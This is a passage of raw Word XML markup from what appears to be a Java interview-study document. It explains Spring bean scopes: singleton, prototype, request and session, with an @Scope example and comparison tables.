        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28212A79" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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8684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PrototypeBea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B672453" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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8684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PrototypeBea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EE938C0" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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8684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ew Instance Created!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34330B39" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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8684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B5CCCC8" w14:textId="494517F0" w:rsidR="003D2495" w:rsidRPr="00CE4B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86846"/>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5130F8F6"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 also define scope in XML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23125442" w14:textId="6141D37D" w:rsidR="003D2495" w:rsidRPr="00CE4B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579738"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;bean</w:t>
      </w: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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"myBean"</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"com.example.MyBean"</w:t>
      </w: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scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"prototype"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D899B" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EE58F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FE8D728">
          <v:rect id="_x0000_i2075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44F159" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="00EE58F0">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ingleton vs Prototyp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4"/>
        <w:gridCol w:w="2275"/>
        <w:gridCol w:w="2596"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="2A979CFC" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21EBCEB5" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="003D2495">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6E65B464" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="003D2495">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ingleton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC65AD6" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="003D2495">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rototype</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="269C2D64" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156E2FD7"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an Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F2DF8BD"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e per container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61AC35E3"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e per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="354068C0" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50862CB2"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fe Cycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466D7A90"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naged by Spring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7103AE3E"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manage post-creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="2C476DAE" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02FF5AB5"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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="194773C6"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teless shared services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6531383D"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teful, non-shared objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B4766CE" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EE58F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292DCBD">
          <v:rect id="_x0000_i2076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3FC854" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="00EE58F0">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eb-Specific Scopes (Request, Session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F4E9AC" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="00EE58F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nly available in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Web Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, used like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EE5280" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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093516"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DFD1BE" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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093516"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Scope</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valu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WebApplicationContex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COPE_REQUE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roxyMod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copedProxyMod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ARGET_CLASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E2650" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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09351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equestScopedBea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5909F0F" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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09351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ne instance per HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20094DC7" w14:textId="45CF091E" w:rsidR="003D2495" w:rsidRPr="00CE4B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093516"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951615A" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EE58F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2B3C3E">
          <v:rect id="_x0000_i2077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="321078B6" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="00EE58F0">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF3AEBE" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ingleton (default):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> One bean instance per container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B837395" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ototype:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> New instance each time it's injected/requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5FCB0" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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quest, Session, etc.:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Useful in web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBB298" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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 use @Scope annotation to define the scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F5613" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EE58F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0B2DA7C">
          <v:rect id="_x0000_i2078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7912ABDB" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="00EE58F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BE36A5" w14:textId="2D759821" w:rsidR="009F301D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E34E21">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="_Toc196307909"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain any scope of spring bean</w:t>
      </w:r>
      <w:r w:rsidR="009F301D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w14:paraId="3BFD6C94" w14:textId="248DDA06" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FE6706">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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at is Singleton Bean Scope?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B2B42" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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Spring, Singleton scope means that only one instance of the bean is created per Spring IoC container. That same instance is shared and injected wherever the bean is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33802002" w14:textId="77777777" w:rsidR="004D63AF" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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ote:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF72D02" w14:textId="6A93646A" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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is is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the same as the Singleton Design Pattern — here, it's managed by the Spring container, not the class itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186A21B" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FA6B5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170F8E9">
          <v:rect id="_x0000_i2079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A95BA" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0505D3BB" w14:textId="4CCEF934" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">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Characterist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8"/>
        <w:gridCol w:w="5584"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="1EB9A030" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B987251" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">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32666EE9" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">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FA6B51" w:rsidRPr="00CE4B95" w14:paraId="0810C8DB" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5243061C" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="704E549C" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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gleton (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="72B9F207" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F6277E" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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umber of Instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C55CD83" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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ly one per Spring container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="0FEAAB01" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6286F5C5" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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bject Sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E8F70E3" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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ame bean instance is shared across the entire application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="22F1C491" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38AF06A0" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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read Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D9E09FC" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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t thread-safe by default (you must handle synchronization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="18B84ED6" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="300EB51C" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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fecycle Managed by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F46C31F" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71B521A9" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FA6B5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609AC15">
          <v:rect id="_x0000_i2080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD939E5" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">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de Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D300137" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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063415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
